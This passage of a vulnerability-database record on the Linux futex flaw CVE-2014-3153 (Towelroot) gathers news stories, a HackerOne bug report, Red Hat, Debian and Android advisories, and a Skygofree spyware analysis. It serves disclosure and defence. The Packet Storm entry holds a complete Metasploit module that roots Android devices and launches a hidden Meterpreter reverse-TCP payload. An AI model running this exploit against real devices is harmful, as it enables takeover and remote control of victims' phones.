On one hand, the famed developer George Hotz (GeoHot) built the tool that roots the Samsung Galaxy S5 (Verizon and AT&T) and other Android devices; on the other, Pinkie Pie discovered the vulnerability that GeoHot's TowelRoot exploits.\n", "modified": "2014-06-25T18:50:44", "published": "2014-06-17T22:49:00", "id": "THN:B829D3A52189C266464176E0C3E66EE3", "href": "https://thehackernews.com/2014/06/towelroot-one-click-android-rooting.html", "type": "thn", "title": "Towelroot : One-Click Android Rooting Tool Released By Geohot", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:59", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153", "CVE-2013-6282"], "description": "[](<https://2.bp.blogspot.com/-V8phNGgfpSE/WD8Aft7xCiI/AAAAAAAAqZU/HmwEEw_qQFEcCUYdJ2f3GJxZ2mo4MBklgCLcB/s1600/android-malware.png>)\n\nIf you own an Android smartphone, beware! A new Android malware that has already breached more than 1 Million Google accounts is infecting around 13,000 devices every day. \n \nDubbed **Gooligan**, the malware roots vulnerable Android devices to steal email addresses and authentication tokens stored on them. \n \nWith this information in hand, the attackers are able to hijack your Google account and access your sensitive information from Google apps including Gmail, Google Photos, Google Docs, Google Play, Google Drive, and G Suite. \n \nResearchers found traces of Gooligan code in dozens of legitimate-looking Android apps on 3rd-party app stores which, once downloaded and installed by an Android user, start sending the device\u2019s information and stolen data to the malware's Command and Control (C&C) server. 
\n\n\n> \"Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153),\" researchers said in a [blog post](<http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/>).\n\n> \"If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely.\"\n\nAccording to CheckPoint security researchers, who uncovered the malware, anyone running an older version of the Android operating system, including Android 4.x (Jelly Bean, KitKat) and 5.x, (Lollipop) is most at risk, which represents nearly 74% of Android devices in use today. \n\n\n> \"These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user,\" researchers added.\n\nOnce hack into any Android device, Gooligan also generates revenues for the cyber criminals by fraudulently buying and installing apps from Google Play Store and rating them and writing reviews on behalf of the phone's owner. The malware also installs adware to generate revenue. \n \n\n\n### **How to check if your Google account has been compromised with this malware? **\n\n \nCheck Point has published an online tool to check if your Android device has been infected with the Gooligan malware. Just open \u2018[Gooligan Checker](<https://gooligan.checkpoint.com/>)\u2019 and enter your Google email address to find out if you've been hacked. \n \nIf you found yourself infected, Adrian Ludwig, Google's director of Android security, has recommended you to run a clean installation of the operating system on your Android device. \n \nThis process is called 'Flashing,' which is quite a complicated process. 
So, the company recommends you to power off your device and approach a certified technician or your mobile service provider in order to re-flash your device.\n", "modified": "2016-11-30T16:44:21", "published": "2016-11-30T05:44:00", "id": "THN:94A8976C00B182A05720DD5149AC5DE0", "href": "https://thehackernews.com/2016/11/hack-google-account.html", "type": "thn", "title": "Over 1 Million Google Accounts Hacked by 'Gooligan' Android Malware", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:18:06", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153", "CVE-2015-3636", "CVE-2013-6282"], "description": "[](<https://4.bp.blogspot.com/-0PWhl6H9Y60/WV5wVvXyHzI/AAAAAAAAtfI/WbYQLAVlyRsR69nqxKmJiaD9zOLuwdv8ACLcBGAs/s1600/android-copycat-rooting-malware.png>)\n\nA newly uncovered malware strain has already infected more than 14 Million Android devices around the world, earning its operators approximately $1.5 Million in fake ad revenues in just two months. \n \nDubbed **CopyCat**, the malware has capabilities to root infected devices, establish persistency, and inject malicious code into** Zygote** \u2013 a daemon responsible for launching apps on Android, providing the hackers full access to the devices. \n \n\n\n### Over 14 Million Devices Infected; 8 Million of them Rooted\n\n \nAccording to the security researchers at Check Point who [discovered](<http://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/>) this malware strain, CopyCat malware has infected 14 million devices, rooted nearly 8 million of them, had 3.8 million devices serve ads, and 4.4 million of them were used to steal credit for installing apps on Google Play. \n \nWhile the majority of victims hit by the CopyCat malware resides in South and Southeast Asia with India being the most affected country, more than 280,000 Android devices in the United States were also infected. 
\n \nWhile there's no evidence that the CopyCat malware has been distributed on Google Play, the Check Point researchers believe that millions of victims got infected through third-party app downloads and phishing attacks. \n \nLike **[Gooligan](<https://thehackernews.com/2016/11/hack-google-account.html>)**, CopyCat malware also uses_ \"state-of-the-art technology\"_ to carry out various forms of advertisement fraud. \n \nCopyCat uses several exploits, including CVE-2013-6282 (VROOT), CVE-2015-3636 (PingPongRoot), and CVE-2014-3153 (Towelroot) to hit devices running Android 5.0 and earlier, which are all widely used and very old, with the most recent uncovered 2 years ago. \n \nThe success of the campaign clearly indicates that millions of Android users still rely on old, unpatched, unsupported devices. \n \n\n\n### Here's How CopyCat Infects Android Devices\n\n \nCopyCat disguises as a popular Android app that users download from third-party stores. Once downloaded, the malware starts collecting data about the infected device and downloads rootkits to help root the victim's smartphone. \n \nAfter rooting the Android device, the CopyCat malware removes security defenses from the device and injects code into the Zygote app launching process to fraudulently install apps and display ads and generate revenue. \n\n\n> \"CopyCat abuses the Zygote process to display fraudulent ads while hiding their origin, making it difficult for users to understand what's causing the ads to pop-up on their screens,\" Check Point researchers say. \n\n> \"CopyCat also installs fraudulent apps directly to the device, using a separate module. These activities generate large amounts of profits for the creators of CopyCat, given a large number of devices infected by the malware.\"\n\nIn just two months of time span, the CopyCat malware helped the hackers make more than $1.5 Million in revenue. 
The majority of profit (over $735,000) came from nearly 4.9 million fake installations on infected devices, which displays up to 100 million ads. \n \nThe majority of victims are located in India, Pakistan, Bangladesh, Indonesia, and Myanmar, though over 381,000 devices in Canada and more than 280,000 devices in the U.S. are infected with CopyCat. \n \n\n\n### CopyCat Malware Spreads Using Chinese Advertising Network\n\n \nWhile there's no direct evidence on who is behind the CopyCat malware campaign, researchers at Check Point found below-mentioned connections that indicate hackers might have used Chinese advertising network 'MobiSummer' for the distribution of the malware. \n\n\n * CopyCat malware and MobiSummer operate on the same server\n * Several lines of CopyCat's code is signed by MobiSummer\n * CopyCat and MobiSummer use the same remote services\n * CopyCat did not target Chinese users despite over half of the victims residing in Asia\n\n> \"It is important to note that while these connections exist, it does not necessarily mean the malware was created by the company, and it is possible the perpetrators behind it used MobiSummer\u2019s code and infrastructure without the firm\u2019s knowledge\" Check Point researchers say. \n\nAndroid users on older devices are still vulnerable to the CopyCat attack, but only if they are downloading apps from third-party app stores. \n \nIn March 2017, Check Point researchers informed Google about the CopyCat campaign, and the tech giant has already updated Play Protect to block the malware. 
\n \nSo, Android users even on older devices are protected through Play Protect, which is updated regularly as malware strains such as CopyCat continue to grow.\n", "modified": "2017-07-07T14:13:25", "published": "2017-07-06T05:17:00", "id": "THN:608C3D3E206B655519193316EAFA2C22", "href": "https://thehackernews.com/2017/07/copycat-rooting-malware.html", "type": "thn", "title": "CopyCat Android Rooting Malware Infected 14 Million Devices", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:49", "bulletinFamily": "info", "cvelist": ["CVE-2014-3145", "CVE-2014-3144", "CVE-2014-3153", "CVE-2014-0476"], "description": "[](<https://2.bp.blogspot.com/-pxMyh-8rhv0/U5L2SbAMTZI/AAAAAAAAb_I/A-iqdubuyv8/s1600/linux-kernel-hacking.jpg>)\n\nMultiple flaws have been identified in Linux Kernel and related software could allow hackers to hack your Linux machines, shared hosting and websites hosted on them.\n\n \n\n\n**PRIVILEGE ESCALATION VULNERABILITY IN LINUX KERNEL**\n\nA privilege escalation vulnerability has been [identified](<https://lists.debian.org/debian-security-announce/2014/msg00130.html>) in the widely used Linux kernel that could allow an attackers to take the control of users\u2019 system.\n\n \n\n\nOn Thursday, the most popular distributor of open source Linux OS, Debian warned about this vulnerability (CVE-2014-3153) in a security update, along with some other vulnerabilities in the Linux kernel that may lead to a denial of service attack.\n\n \n\n\nThe most critical one is the flaw (CVE-2014-3153) discovered by Pinkie Pie which resides in the futex subsystem call of _[Linux Kernel](<https://thehackernews.com/search/label/Linux%20kernel>) 2.6.32.62/3.2.59/3.4.91/3.10.41/3.12.21/3.14.5 versions_, leaving a queued kernel waiter on the stack, which can be exploited to potentially execute arbitrary code with kernel mode privileges.\n\n> \"_Pinkie Pie discovered an issue in the futex subsystem 
that allows a local user to gain ring 0 control via the futex syscall,_\" reads the advisory. \"_An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation.\"_\n\n[Pinkie Pie](<https://thehackernews.com/search/label/Pinkie%20Pie%20hacker>) is the anonymous, highly skilled teenage ethical hacker who has collected at least $100,000 for bypassing the security features of Google's Chrome, many of them sandbox exploits, at both the Pwnium and Pwn2Own competitions every year since 2012.\n\n \n\n\n**RESEARCHER\u2019S ADVICE**\n\n_Kees Cook_, a Google Chrome OS security researcher and Ubuntu contributor, said that the latest flaw found by Pinkie Pie is \"urgent to fix.\"\n\n> \"_Specifically, the futex syscall can leave a queued kernel waiter hanging on the stack. By manipulating the stack with further syscalls, the waiter structure can be altered. When later woken up, the altered waiter can result in arbitrary code execution in ring 0,_\" Cook [wrote](<http://seclists.org/oss-sec/2014/q2/469>) Thursday on Seclists.org. \"_This flaw is especially urgent to fix because futex tends to be available within most Linux sandboxes (because it is used as a glibc pthread primitive)._\"\n\n**CHKROOTKIT - ANOTHER CRITICAL FLAW**\n\nThe vulnerability came to light two days after Thomas Stangner [reported](<http://www.openwall.com/lists/oss-security/2014/06/04/9>) a serious flaw in chkrootkit (Check Rootkit), a rootkit detector, that allows a local attacker to gain root control by having chkrootkit execute malicious code placed in the _/tmp_ directory.\n\n \n\n\nA common Unix-based program, chkrootkit helps system administrators check their systems for known rootkits. The vulnerability in chkrootkit, assigned the identifier **_CVE-2014-0476_**, resides in the slapper() function of the chkrootkit shell script. 
A non-root user can place a malicious executable named 'update' in the _/tmp_ folder, and it will be executed as root whenever chkrootkit scans that directory for rootkits.\n\n \n\n\n**OTHER VULNERABILITIES IN LINUX KERNEL**\n\nTwo further security issues (_**CVE-2014-3144 and CVE-2014-3145**_) have also been discovered in the Linux kernel; they could allow any local user to cause a [Denial of Service (DoS) attack](<https://thehackernews.com/search/label/dos%20attack>) via crafted BPF instructions.\n\n \n\n\nDebian has issued patches for these vulnerabilities and encouraged users to upgrade their Linux packages, noting that the issues have been fixed in the stable distribution in version 3.2.57-3+deb7u2 and will be fixed in the unstable distribution as soon as possible. As with any kernel update, the fix only takes effect once the system has been rebooted into the new kernel.\n", "modified": "2014-06-07T11:43:57", "published": "2014-06-07T00:29:00", "id": "THN:B13AEDC0DAC18F19211BE2B4BE0C4787", "href": "https://thehackernews.com/2014/06/linux-kernel-vulnerable-to-privilege_7.html", "type": "thn", "title": "Linux Kernel Vulnerable to Privilege Escalation and DoS Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:37", "description": "", "published": "2015-02-09T00:00:00", "type": "packetstorm", "title": "Android Futex Requeue Kernel Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2015-02-09T00:00:00", "id": "PACKETSTORM:130329", "href": "https://packetstormsecurity.com/files/130329/Android-Futex-Requeue-Kernel-Exploit.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. 
\n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit4 < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Common \n \ndef initialize(info={}) \nsuper( update_info( info, { \n'Name' => 'Android futex requeue kernel exploit', \n'Description' => %q{ \nThis module exploits a bug in futex_requeue in the linux kernel. \nAny android phone with a kernel built before June 2014 should be vulnerable. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Pinkie Pie', #discovery \n'geohot', #towelroot \n'timwr' #metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2014-3153' ], \n[ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ], \n[ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ], \n], \n'SessionTypes' => [ 'meterpreter' ], \n'Platform' => 'android', \n'Targets' => [[ 'Automatic', { }]], \n'Arch' => ARCH_DALVIK, \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'android/meterpreter/reverse_tcp', \n}, \n'DefaultTarget' => 0 \n} \n)) \n \nregister_options([ \nOptString.new(\"WritableDir\", [ true, \"Temporary directory to write files\", \"/data/local/tmp/\" ]), \n], self.class) \nend \n \ndef put_local_file(remotefile) \nlocalfile = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-3153.elf\" ) \ndata = File.read(localfile, {:mode => 'rb'}) \nwrite_file(remotefile, data) \nend \n \ndef exploit \nworkingdir = session.fs.dir.getwd \nexploitfile = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\" \npayloadfile = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\" \n \nput_local_file(exploitfile) \ncmd_exec('/system/bin/chmod 700 ' + exploitfile) \nwrite_file(payloadfile, payload.raw) \n \ntmpdir = datastore['WritableDir'] \nrootclassdir = \"#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}\" \nrootpayload = \"#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar\" \n \nrootcmd = \" mkdir #{rootclassdir} && \" \nrootcmd += 
\"cd #{rootclassdir} && \" \nrootcmd += \"cp \" + payloadfile + \" #{rootpayload} && \" \nrootcmd += \"chmod 766 #{rootpayload} && \" \nrootcmd += \"dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload\" \n \nprocess = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true}) \nprocess.channel.read \nend \n \nend \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130329/futex_requeue.rb.txt"}], "hackerone": [{"lastseen": "2016-09-03T01:44:00", "bulletinFamily": "bugbounty", "bounty": 10000.0, "cvelist": ["CVE-2014-3153"], "description": "I hope I haven't messed something up...\r\n\r\nThe issue exists when after blocking in futex_wait_requeue_pi, q.rt_waiter is NULL but &rt_waiter (on the stack) has been added to various waiter lists by rt_mutex_start_proxy_lock.\r\n\r\nThis is not supposed to be possible, because setting rt_waiter to NULL indicates atomic acquisition. This is done by requeue_pi_wake_futex, which is called by futex_requeue (FUTEX_CMP_REQUEUE_PI) in two cases where the lock could be acquired immediately on behalf of some waiter rather than blocking. Meanwhile, rt_mutex_start_proxy_lock is only called from the bottom of futex_requeue, and only enqueues rt_waiter if the lock could *not* be acquired immediately. Since any particular FUTEX_WAIT_REQUEUE_PI is only supposed to be requeued once, those two possibilities should be mutually exclusive.\r\n\r\nThe requeue-once rule is enforced by only allowing requeueing to the futex previously passed to futex_wait_requeue_pi as uaddr2, so it's not possible to requeue from A to B, then from B to C - but it is possible to requeue from B to B.\r\n\r\nWhen this happens, if (!q.rt_waiter) passes, so rt_mutex_finish_proxy_lock is never called. 
(Also, AFAIK, free_pi_state is never called, which is true even without this weird requeue; in the case where futex_requeue calls requeue_pi_wake_futex directly, pi_state will sit around until it gets cleaned up in exit_pi_state_list when the thread exits. This is not a vulnerability.) futex_wait_requeue_pi exits, and various pointers to rt_waiter become dangling.\r\n\r\nI haven't actually tested this in a sandbox, but from reading the code, I believe most/all the syscalls used in the exploit are allowed by the Chromium renderer, GPU, NaCl, etc. sandbox - in particular, futex, setpriority, and prctl, without restrictions. (setpriority is overridden to allowed in those policies; the others are in the baseline policy.) Also, the exploit should be able to defeat KASLR, although it was not actually enabled in the kernel I was testing on (see comments).\r\n\r\nI have attached an exploit for the Debian 3.14.4-1 Linux image on amd64, which manages to run some code in kernel mode and return. As discussed in the comments, it may be nontrivial to port to other kernel builds due to unpredictable compiler decisions, but I hope it demonstrates exploitability.\r\n\r\n\r\n", "modified": "1970-01-01T00:00:00", "published": "2014-05-26T05:00:49", "id": "H1:13388", "href": "https://hackerone.com/reports/13388", "type": "hackerone", "title": "Sandbox Escape: Linux PI futex self-requeue bug", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "android": [{"lastseen": "2020-12-24T13:21:13", "bulletinFamily": "software", "cvelist": ["CVE-2014-3153"], "description": "The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.", "edition": 2, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "ANDROID:TOWELROOT", 
"href": "http://www.androidvulnerabilities.org/vulnerabilities/TowelRoot.html", "title": "TowelRoot", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1737", "CVE-2014-1738", "CVE-2014-3153"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem handled\nthe requeuing of certain Priority Inheritance (PI) futexes. A local,\nunprivileged user could use this flaw to escalate their privileges on the\nsystem. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled user\nspace provided data in certain error code paths while processing FDRAWCMD\nIOCTL commands. A local user with write access to /dev/fdX could use this\nflaw to free (using the kfree() function) arbitrary kernel memory.\n(CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal kernel\nmemory addresses to user space during the processing of the FDRAWCMD IOCTL\ncommand. A local user with write access to /dev/fdX could use this flaw to\nobtain information about the kernel heap arrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two flaws\n(CVE-2014-1737 in combination with CVE-2014-1738) to escalate their\nprivileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter of\nCVE-2014-3153.\n\nThis update also fixes the following bug:\n\n* A previous change that introduced global clock updates caused guest\nmachines to boot slowly when the host Time Stamp Counter (TSC) was marked\nas unstable. 
The slow down increased with the number of vCPUs allocated.\nTo resolve this problem, a patch has been applied to limit the rate of the\nglobal clock updates. (BZ#1102253)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2015-04-24T14:20:26", "published": "2014-07-17T04:00:00", "id": "RHSA-2014:0900", "href": "https://access.redhat.com/errata/RHSA-2014:0900", "type": "redhat", "title": "(RHSA-2014:0900) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:58", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1737", "CVE-2014-1738", "CVE-2014-3153"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem handled\nthe requeuing of certain Priority Inheritance (PI) futexes. A local,\nunprivileged user could use this flaw to escalate their privileges on the\nsystem. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled user\nspace provided data in certain error code paths while processing FDRAWCMD\nIOCTL commands. A local user with write access to /dev/fdX could use this\nflaw to free (using the kfree() function) arbitrary kernel memory.\n(CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal kernel\nmemory addresses to user space during the processing of the FDRAWCMD IOCTL\ncommand. A local user with write access to /dev/fdX could use this flaw to\nobtain information about the kernel heap arrangement. 
(CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two flaws\n(CVE-2014-1737 in combination with CVE-2014-1738) to escalate their\nprivileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter of\nCVE-2014-3153.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2015-04-24T14:20:41", "published": "2014-06-26T04:00:00", "id": "RHSA-2014:0800", "href": "https://access.redhat.com/errata/RHSA-2014:0800", "type": "redhat", "title": "(RHSA-2014:0800) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3145", "CVE-2014-3144", "CVE-2014-3153"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2949-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nJune 05, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2014-3144 CVE-2014-3145 CVE-2014-3153\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation:\n\nCVE-2014-3144 / CVE-2014-3145\n\n A local user can cause a denial of service (system crash) via\n crafted BPF instructions.\n\nCVE-2014-3153\n\n Pinkie Pie discovered an issue in the futex subsystem that allows a\n local user to gain ring 0 control via the futex syscall. 
An\n unprivileged user could use this flaw to crash the kernel (resulting\n in denial of service) or for privilege escalation.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 3.2.57-3+deb7u2.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2014-06-05T12:16:16", "published": "2014-06-05T12:16:16", "id": "DEBIAN:DSA-2949-1:5D47D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00130.html", "title": "[SECURITY] [DSA 2949-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:12", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0224", "CVE-2014-3470", "CVE-2014-0195", "CVE-2014-3153", "CVE-2014-0221"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2950-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJune 05, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0195 CVE-2014-0221 CVE-2014-0224 CVE-2014-3470\n\nMultiple vulnerabilities have been discovered in OpenSSL:\n\nCVE-2014-0195\n\n Jueri Aedla discovered that a buffer overflow in processing DTLS\n fragments could lead to the execution of arbitrary code or denial\n of service.\n\nCVE-2014-0221\n\n Imre Rad discovered the processing of DTLS hello packets is \n susceptible to denial of service.\n\nCVE-2014-0224\n\n KIKUCHI Masashi discovered that carefully crafted handshakes can\n force the use of weak 
keys, resulting in potential man-in-the-middle\n attacks.\n\nCVE-2014-3470\n\n Felix Groebert and Ivan Fratric discovered that the implementation of\n anonymous ECDH ciphersuites is suspectible to denial of service.\n\nAdditional information can be found at \nhttp://www.openssl.org/news/secadv_20140605.txt\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u10. All applications linked to openssl need to\nbe restarted. You can use the tool checkrestart from the package\ndebian-goodies to detect affected programs or reboot your system. There's\nalso a forthcoming security update for the Linux kernel later the day\n(CVE-2014-3153), so you need to reboot anyway. Perfect timing, isn't it?\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2014-06-05T11:50:58", "published": "2014-06-05T11:50:58", "id": "DEBIAN:DSA-2950-1:15DF5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00129.html", "title": "[SECURITY] [DSA 2950-1] openssl security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2018-01-17T15:58:19", "bulletinFamily": "blog", "cvelist": ["CVE-2013-2094", "CVE-2013-2595", "CVE-2013-6282", "CVE-2014-3153", "CVE-2015-3636"], "description": "\n\nAt the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. 
We believe the initial versions of this malware were created at least three years ago \u2013 at the end of 2014. Since then, the implant's functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.\n\nWe observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy.\n\nMoreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild.\n\nWe named the malware Skygofree, because we found the word in one of the domains*. \n\n## Malware Features\n\n### Android\n\nAccording to the observed samples and their signatures, early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-1.png>)\n\n_Signature of one of the earliest versions_\n\nThe code and functionality have changed numerous times; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device. 
We have examined all the detected versions, including the latest one that is signed by a certificate valid from September 14, 2017.\n\nThe implant provides the ability to grab a lot of exfiltrated data, like call records, text messages, geolocation, surrounding audio, calendar events, and other memory information stored on the device.\n\nAfter manual launch, it shows a fake welcome notification to the user:\n\n_Dear Customer, we're updating your configuration and it will be ready as soon as possible._\n\nAt the same time, it hides an icon and starts background services to hide further actions from the user.\n\n**Service Name** | **Purpose** \n---|--- \nAndroidAlarmManager | Uploading last recorded .amr audio \nAndroidSystemService | Audio recording \nAndroidSystemQueues | Location tracking with movement detection \nClearSystems | GSM tracking (CID, LAC, PSC) \nClipService | Clipboard stealing \nAndroidFileManager | Uploading all exfiltrated data \nAndroidPush | XMPP \u0421&C protocol (url.plus:5223) \nRegistrationService | Registration on C&C via HTTP (url.plus/app/pro/) \n \nInterestingly, a self-protection feature was implemented in almost every service. Since in Android 8.0 (SDK API 26) the system is able to kill idle services, this code raises a fake update notification to prevent it:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-2.png>)\n\nCybercriminals have the ability to control the implant via HTTP, XMPP, binary SMS and [FirebaseCloudMessaging](<https://firebase.google.com/docs/cloud-messaging/>) (or GoogleCloudMessaging in older versions) protocols. Such a diversity of protocols gives the attackers more flexible control. In the latest implant versions there are 48 different commands. You can find a full list with short descriptions in the Appendix. 
Here are some of the most notable:\n\n * 'geofence' - this command adds a specified location to the implant's internal database and when it matches a device's current location the malware triggers and begins to record surrounding audio.\n * \"social\" \u2013 this command that starts the 'AndroidMDMSupport' service - this allows the files of any other installed application to be grabbed. The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools. The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading. \n\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-3.png>)\n\n_Several hardcoded applications targeted by the MDM-grabbing command_\n\n * 'wifi' \u2013 this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled. So, when a device connects to the established network, this process will be in silent and automatic mode. This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle (MitM) attacks. \n\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-4.png>)\n\n_addWifiConfig method code fragments_\n\n * 'camera' \u2013 this command records a video/capture a photo using the front-facing camera when someone next unlocks the device.\n\nSome versions of the Skygofree feature the self-protection ability exclusively for Huawei devices. There is a 'protected apps' list in this brand's smartphones, related to a battery-saving concept. Apps not selected as protected apps stop working once the screen is off and await re-activation, so the implant is able to determine that it is running on a Huawei device and add itself to this list. 
